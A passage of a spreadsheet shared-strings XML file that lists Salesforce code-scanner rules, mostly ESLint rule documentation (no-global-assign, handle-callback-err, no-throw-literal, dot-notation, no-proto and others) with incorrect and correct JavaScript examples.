    <t>sf:AuraControllerNaming</t>
  </si>
  <si>
    <t>Aura Controller Naming Convention</t>
  </si>
  <si>
    <t>sf:TrackNoSonar</t>
  </si>
  <si>
    <t>Track Usage of //NOSONAR</t>
  </si>
  <si>
    <t>sf:TrackSuppressWarnings</t>
  </si>
  <si>
    <t>Track Usage of @SuppressWarnings</t>
  </si>
  <si>
    <t>cs-vf:no-global-assign</t>
  </si>
  <si>
    <t>disallow assignment to native objects</t>
  </si>
  <si>
    <t>&lt;h1 id="disallowassignmenttonativeobjectsorreadonlyglobalvariablesnoglobalassign"&gt;Disallow assignment to native objects or read-only global variables (no-global-assign)&lt;/h1&gt;\n&lt;p&gt;JavaScript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code:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;window = {};\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;While examples such as &lt;code&gt;window&lt;/code&gt; are obvious, there are often hundreds of built-in global objects provided by JavaScript environments. It can be hard to know if you're assigning to a global variable or not.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows modifications to read-only global variables.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-global-assign: "error"*/\n\nObject = null\nundefined = 1\n&lt;/code&gt;&lt;/pre&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-global-assign: "error"*/\n/*eslint-env browser*/\n\nwindow = {}\nlength = 1\ntop = 1\n&lt;/code&gt;&lt;/pre&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-global-assign: "error"*/\n/*globals a:false*/\n\na = 1\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-global-assign: "error"*/\n\na = 1\nvar b = 1\nb = 2\n&lt;/code&gt;&lt;/pre&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-global-assign: "error"*/\n/*eslint-env browser*/\n\nonload = function() {}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-global-assign: "error"*/\n/*globals a:true*/\n\na = 1\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule accepts an &lt;code&gt;exceptions&lt;/code&gt; option, which can be used to specify a list of builtins for which reassignments will be allowed:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="json language-json"&gt;{\n    "rules": {\n        "no-global-assign": ["error", {"exceptions": ["Object"]}]\n    }\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you are trying to override one of the native objects.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Visual Force &amp; Lightning</t>
  </si>
  <si>
    <t>cs-vf:handle-callback-err</t>
  </si>
  <si>
    <t>require error handling in callbacks</t>
  </si>
  <si>
    <t>&lt;p&gt;In Node.js, a common pattern for dealing with asynchronous behavior is called the callback pattern.\nThis pattern expects an &lt;code&gt;Error&lt;/code&gt; object or &lt;code&gt;null&lt;/code&gt; as the first argument of the callback.\nForgetting to handle these errors can lead to some really strange behavior in your application.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;function loadData (err, data) {\n    doSomething(); // forgot to handle error\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule expects that when you're using the callback pattern in Node.js you'll handle the error.&lt;/p&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;The rule takes a single string option: the name of the error parameter. The default is &lt;code&gt;"err"&lt;/code&gt;.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule with the default &lt;code&gt;"err"&lt;/code&gt; parameter name:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint handle-callback-err: "error"*/\n\nfunction loadData (err, data) {\n    doSomething();\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with the default &lt;code&gt;"err"&lt;/code&gt; parameter name:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint handle-callback-err: "error"*/\n\nfunction loadData (err, data) {\n    if (err) {\n        console.log(err.stack);\n    }\n    doSomething();\n}\n\nfunction generateError (err) {\n    if (err) {}\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule with a sample &lt;code&gt;"error"&lt;/code&gt; parameter name:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint handle-callback-err: ["error", "error"]*/\n\nfunction loadData (error, data) {\n    if (error) {\n       console.log(error.stack);\n    }\n    doSomething();\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="regularexpression"&gt;regular expression&lt;/h3&gt;\n&lt;p&gt;Sometimes (especially in big projects) the name of the error variable is not consistent across the project,\nso you need a more flexible configuration to ensure that the rule reports all unhandled errors.&lt;/p&gt;\n&lt;p&gt;If the configured name of the error variable begins with a &lt;code&gt;^&lt;/code&gt; it is considered to be a regexp pattern.&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;If the option is &lt;code&gt;"^(err|error|anySpecificError)$"&lt;/code&gt;, the rule reports unhandled errors where the parameter name can be &lt;code&gt;err&lt;/code&gt;, &lt;code&gt;error&lt;/code&gt; or &lt;code&gt;anySpecificError&lt;/code&gt;.&lt;/li&gt;\n&lt;li&gt;If the option is &lt;code&gt;"^.+Error$"&lt;/code&gt;, the rule reports unhandled errors where the parameter name ends with &lt;code&gt;Error&lt;/code&gt; (for example, &lt;code&gt;connectionError&lt;/code&gt; or &lt;code&gt;validationError&lt;/code&gt; will match).&lt;/li&gt;\n&lt;li&gt;If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match).&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;There are cases where it may be safe for your application to ignore errors, however only ignore errors if you are\nconfident that some other form of monitoring will help you catch the problem.&lt;/p&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="https://github.com/maxogden/art-of-node#callbacks"&gt;The Art Of Node: Callbacks&lt;/a&gt;&lt;/li&gt;\n&lt;li&gt;&lt;a href="https://docs.nodejitsu.com/articles/errors/what-are-the-error-conventions/"&gt;Nodejitsu: What are the error conventions?&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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exceptions.\nThe fundamental benefit of &lt;code&gt;Error&lt;/code&gt; objects is that they automatically keep track of where they were built and originated.&lt;/p&gt;\n&lt;p&gt;This rule restricts what can be thrown as an exception.  When it was first created, it only prevented literals from being thrown (hence the name), but it has now been expanded to only allow expressions which have a possibility of being an &lt;code&gt;Error&lt;/code&gt; object.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule is aimed at maintaining consistency when throwing exception by disallowing to throw literals and other expressions which cannot possibly be an &lt;code&gt;Error&lt;/code&gt; object.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-throw-literal: "error"*/\n/*eslint-env es6*/\n\nthrow "error";\n\nthrow 0;\n\nthrow undefined;\n\nthrow null;\n\nvar err = new Error();\nthrow "an " + err;\n// err is recast to a string literal\n\nvar err = new Error();\nthrow `${err}`\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-throw-literal: "error"*/\n\nthrow new Error();\n\nthrow new Error("error");\n\nvar e = new Error("error");\nthrow e;\n\ntry {\n    throw new Error("error");\n} catch (e) {\n    throw e;\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="knownlimitations"&gt;Known Limitations&lt;/h2&gt;\n&lt;p&gt;Due to the limits of static analysis, this rule cannot guarantee that you will only throw &lt;code&gt;Error&lt;/code&gt; objects.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule, but which do not throw an &lt;code&gt;Error&lt;/code&gt; object:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-throw-literal: "error"*/\n\nvar err = "error";\nthrow err;\n\nfunction foo(bar) {\n    console.log(bar);\n}\nthrow foo("error");\n\nthrow new String("error");\n\nvar foo = {\n    bar: "error"\n};\nthrow foo.bar;\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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minimizers.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;foo["bar"];\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule is aimed at maintaining code consistency and improving code readability by encouraging use of the dot notation style whenever possible. As such, it will warn when it encounters an unnecessary use of square-bracket notation.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint dot-notation: "error"*/\n\nvar x = foo["bar"];\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint dot-notation: "error"*/\n\nvar x = foo.bar;\n\nvar x = foo[bar];    // Property name is a variable, square-bracket notation required\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule accepts a single options argument:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;Set the &lt;code&gt;allowKeywords&lt;/code&gt; option to &lt;code&gt;false&lt;/code&gt; (default is &lt;code&gt;true&lt;/code&gt;) to follow ECMAScript version 3 compatible style, avoiding dot notation for reserved word properties.&lt;/li&gt;\n&lt;li&gt;Set the &lt;code&gt;allowPattern&lt;/code&gt; option to a regular expression string to allow bracket notation for property names that match a pattern (by default, no pattern is tested).&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h3 id="allowkeywords"&gt;allowKeywords&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "allowKeywords": false }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint dot-notation: ["error", { "allowKeywords": false }]*/\n\nvar foo = { "class": "CS 101" }\nvar x = foo["class"]; // Property name is a reserved word, square-bracket notation required\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="allowpattern"&gt;allowPattern&lt;/h3&gt;\n&lt;p&gt;For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notation.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the sample &lt;code&gt;{ "allowPattern": "^[a-z]+(_[a-z]+)+$" }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint camelcase: "error"*/\n/*eslint dot-notation: ["error", { "allowPattern": "^[a-z]+(_[a-z]+)+$" }]*/\n\nvar data = {};\ndata.foo_bar = 42;\n\nvar data = {};\ndata["fooBar"] = 42;\n\nvar data = {};\ndata["foo_bar"] = 42; // no warning\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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functions.&lt;/p&gt;\n&lt;p&gt;The &lt;a href="https://es5.github.io/#x15.8"&gt;ECMAScript 5 specification&lt;/a&gt; makes it clear that both &lt;code&gt;Math&lt;/code&gt; and &lt;code&gt;JSON&lt;/code&gt; cannot be invoked:&lt;/p&gt;\n&lt;blockquote&gt;\n  &lt;p&gt;The Math object does not have a &lt;code&gt;[[Call]]&lt;/code&gt; internal property; it is not possible to invoke the Math object as a function.&lt;/p&gt;\n&lt;/blockquote&gt;\n&lt;p&gt;And the &lt;a href="https://www.ecma-international.org/ecma-262/6.0/index.html#sec-reflect-object"&gt;ECMAScript 2015 specification&lt;/a&gt; makes it clear that &lt;code&gt;Reflect&lt;/code&gt; cannot be invoked:&lt;/p&gt;\n&lt;blockquote&gt;\n  &lt;p&gt;The Reflect object also does not have a &lt;code&gt;[[Call]]&lt;/code&gt; internal method; it is not possible to invoke the Reflect object as a function.&lt;/p&gt;\n&lt;/blockquote&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows calling the &lt;code&gt;Math&lt;/code&gt;, &lt;code&gt;JSON&lt;/code&gt; and &lt;code&gt;Reflect&lt;/code&gt; objects as functions.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-obj-calls: "error"*/\n\nvar math = Math();\nvar json = JSON();\nvar reflect = Reflect();\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-obj-calls: "error"*/\n\nfunction area(r) {\n    return Math.PI * r * r;\n}\nvar object = JSON.parse("{}");\nvar value = Reflect.get({ x: 1, y: 2 }, "x");\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="https://es5.github.io/#x15.8"&gt;The Math Object&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-new</t>
  </si>
  <si>
    <t>disallow `new` operators outside of assignments or comparisons</t>
  </si>
  <si>
    <t>&lt;p&gt;The goal of using &lt;code&gt;new&lt;/code&gt; with a constructor is typically to create an object of a particular type and store that object in a variable, such as:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var person = new Person();\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;It's less common to use &lt;code&gt;new&lt;/code&gt; and not store the result, such as:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;new Person();\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;In this case, the created object is thrown away because its reference isn't stored anywhere, and in many cases, this means that the constructor should be replaced with a function that doesn't require &lt;code&gt;new&lt;/code&gt; to be used.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule is aimed at maintaining consistency and convention by disallowing constructor calls using the &lt;code&gt;new&lt;/code&gt; keyword that do not assign the resulting object to a variable.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-new: "error"*/\n\nnew Thing();\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-new: "error"*/\n\nvar thing = new Thing();\n\nThing();\n&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>cs-vf:no-unused-expressions</t>
  </si>
  <si>
    <t>disallow unused expressions</t>
  </si>
  <si>
    <t>&lt;p&gt;An unused expression which has no effect on the state of the program indicates a logic error.&lt;/p&gt;\n&lt;p&gt;For example, &lt;code&gt;n + 1;&lt;/code&gt; is not a syntax error, but it might be a typing mistake where a programmer meant an assignment statement &lt;code&gt;n += 1;&lt;/code&gt; instead.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule aims to eliminate unused expressions which have no effect on the state of the program.&lt;/p&gt;\n&lt;p&gt;This rule does not apply to function calls or constructor calls with the &lt;code&gt;new&lt;/code&gt; operator, because they could have &lt;em&gt;side effects&lt;/em&gt; on the state of the program.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var i = 0;\nfunction increment() { i += 1; }\nincrement(); // return value is unused, but i changed as a side effect\n\nvar nThings = 0;\nfunction Thing() { nThings += 1; }\nnew Thing(); // constructed object is unused, but nThings changed as a side effect\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;This rule does not apply to directives (which are in the form of literal string expressions such as &lt;code&gt;"use strict";&lt;/code&gt; at the beginning of a script, module, or function).&lt;/p&gt;\n&lt;p&gt;Sequence expressions (those using a comma, such as &lt;code&gt;a = 1, b = 2&lt;/code&gt;) are always considered unused unless their return value is assigned or used in a condition evaluation, or a function call is made with the sequence expression value.&lt;/p&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule, in its default state, does not require any arguments. If you would like to enable one or more of the following you may pass an object with the options set as follows:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;allowShortCircuit&lt;/code&gt; set to &lt;code&gt;true&lt;/code&gt; will allow you to use short circuit evaluations in your expressions (Default: &lt;code&gt;false&lt;/code&gt;).&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;allowTernary&lt;/code&gt; set to &lt;code&gt;true&lt;/code&gt; will enable you to use ternary operators in your expressions similarly to short circuit evaluations (Default: &lt;code&gt;false&lt;/code&gt;).&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;allowTaggedTemplates&lt;/code&gt; set to &lt;code&gt;true&lt;/code&gt; will enable you to use tagged template literals in your expressions (Default: &lt;code&gt;false&lt;/code&gt;).&lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;These options allow unused expressions &lt;em&gt;only if all&lt;/em&gt; of the code paths either directly change the state (for example, assignment statement) or could have &lt;em&gt;side effects&lt;/em&gt; (for example, function call).&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the default &lt;code&gt;{ "allowShortCircuit": false, "allowTernary": false }&lt;/code&gt; options:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: "error"*/\n\n0\n\nif(0) 0\n\n{0}\n\nf(0), {}\n\na &amp;&amp; b()\n\na, b()\n\nc = a, b;\n\na() &amp;&amp; function namedFunctionInExpressionContext () {f();}\n\n(function anIncompleteIIFE () {});\n\ninjectGlobal`body{ color: red; }`\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Note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directives.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;"use strict";\n"use asm"\n"use stricter";\n"use babel"\n"any other strings like this in the prologue";\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the default &lt;code&gt;{ "allowShortCircuit": false, "allowTernary": false }&lt;/code&gt; options:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: "error"*/\n\n{} // In this context, this is a block statement, not an object literal\n\n{myLabel: someVar} // In this context, this is a block statement with a label and expression, not an object literal\n\nfunction namedFunctionDeclaration () {}\n\n(function aGenuineIIFE () {}());\n\nf()\n\na = 0\n\nnew C\n\ndelete a.b\n\nvoid a\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="allowshortcircuit"&gt;allowShortCircuit&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;{ "allowShortCircuit": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowShortCircuit": true }]*/\n\na || b\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "allowShortCircuit": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowShortCircuit": true }]*/\n\na &amp;&amp; b()\na() || (b = c)\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="allowternary"&gt;allowTernary&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;{ "allowTernary": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowTernary": true }]*/\n\na ? b : 0\na ? b : c()\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "allowTernary": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowTernary": true }]*/\n\na ? b() : c()\na ? (b = c) : d()\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="allowshortcircuitandallowternary"&gt;allowShortCircuit and allowTernary&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "allowShortCircuit": true, "allowTernary": true }&lt;/code&gt; options:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowShortCircuit": true, "allowTernary": true }]*/\n\na ? b() || (c = d) : e()\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h3 id="allowtaggedtemplates"&gt;allowTaggedTemplates&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for the &lt;code&gt;{ "allowTaggedTemplates": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowTaggedTemplates": true }]*/\n\n`some untagged template string`;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the &lt;code&gt;{ "allowTaggedTemplates": true }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unused-expressions: ["error", { "allowTaggedTemplates": true }]*/\n\ntag`some tagged template string`;\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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production.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;if (false) {\n    doSomethingUnfinished();\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows constant expressions in the test condition of:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;if&lt;/code&gt;, &lt;code&gt;for&lt;/code&gt;, &lt;code&gt;while&lt;/code&gt;, or &lt;code&gt;do...while&lt;/code&gt; statement&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;?:&lt;/code&gt; ternary expression&lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-constant-condition: "error"*/\n\nif (false) {\n    doSomethingUnfinished();\n}\n\nif (void x) {\n    doSomethingUnfinished();\n}\n\nfor (;-2;) {\n    doSomethingForever();\n}\n\nwhile (typeof x) {\n    doSomethingForever();\n}\n\ndo {\n    doSomethingForever();\n} while (x = -1);\n\nvar result = 0 ? a : b;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-constant-condition: "error"*/\n\nif (x === 0) {\n    doSomething();\n}\n\nfor (;;) {\n    doSomethingForever();\n}\n\nwhile (typeof x === "undefined") {\n    doSomething();\n}\n\ndo {\n    doSomething();\n} while (x);\n\nvar result = x !== 0 ? a : b;\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;h3 id="checkloops"&gt;checkLoops&lt;/h3&gt;\n&lt;p&gt;Set to &lt;code&gt;true&lt;/code&gt; by default. Setting this option to &lt;code&gt;false&lt;/code&gt; allows constant expressions in loops.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for when &lt;code&gt;checkLoops&lt;/code&gt; is &lt;code&gt;false&lt;/code&gt;:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-constant-condition: ["error", { "checkLoops": false }]*/\n\nwhile (true) {\n    doSomething();\n    if (condition()) {\n        break;\n    }\n};\n\nfor (;true;) {\n    doSomething();\n    if (condition()) {\n        break;\n    }\n};\n\ndo {\n    doSomething();\n    if (condition()) {\n        break;\n    }\n} while (true)\n&lt;/code&gt;&lt;/pre&gt;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</si>
  <si>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</si>
  <si>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</si>
  <si>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code.&lt;/p&gt;\n&lt;p&gt;For example here we are overriding a builtin method that will then affect all Objects, even other builtins.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;// seems harmless\nObject.prototype.extra = 55;\n\n// loop through some userIds\nvar users = {\n    "123": "Stan",\n    "456": "David"\n};\n\n// not what you'd expect\nfor (var id in users) {\n    console.log(id); // "123", "456", "extra"\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;A common suggestion to avoid this problem would be to wrap the inside of the &lt;code&gt;for&lt;/code&gt; loop with &lt;code&gt;users.hasOwnProperty(id)&lt;/code&gt;. However, if this rule is strictly enforced throughout your codebase you won't need to take that step.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;Disallows directly modifying the prototype of builtin objects.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extend-native: "error"*/\n\nObject.prototype.a = "a";\nObject.defineProperty(Array.prototype, "times", { value: 999 });\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule accepts an &lt;code&gt;exceptions&lt;/code&gt; option, which can be used to specify a list of builtins for which extensions will be allowed.&lt;/p&gt;\n&lt;h3 id="exceptions"&gt;exceptions&lt;/h3&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for the sample &lt;code&gt;{ "exceptions": ["Object"] }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extend-native: ["error", { "exceptions": ["Object"] }]*/\n\nObject.prototype.a = "a";\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="knownlimitations"&gt;Known Limitations&lt;/h2&gt;\n&lt;p&gt;This rule &lt;em&gt;does not&lt;/em&gt; report any of the following less obvious approaches to modify the prototype of builtin objects:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var x = Object;\nx.prototype.thing = a;\n\neval("Array.prototype.forEach = 'muhahaha'");\n\nwith(Array) {\n    prototype.thing = 'thing';\n};\n\nwindow.Function.prototype.bind = 'tight';\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;You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</si>
  <si>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cs-vf:no-proto</t>
  </si>
  <si>
    <t>disallow the use of the `__proto__` property</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;__proto__&lt;/code&gt; property has been deprecated as of ECMAScript 3.1 and shouldn't be used in the code. Use &lt;code&gt;getPrototypeOf&lt;/code&gt; method instead.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;When an object is created &lt;code&gt;__proto__&lt;/code&gt; is set to the original prototype property of the object’s constructor function. &lt;code&gt;getPrototypeOf&lt;/code&gt; is the preferred method of getting "the prototype".&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-proto: "error"*/\n\nvar a = obj.__proto__;\n\nvar a = obj["__proto__"];\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-proto: "error"*/\n\nvar a = Object.getPrototypeOf(obj);\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you need to support legacy browsers, you might want to turn this rule off, since support for &lt;code&gt;getPrototypeOf&lt;/code&gt; is not yet universal.&lt;/p&gt;\n&lt;h2 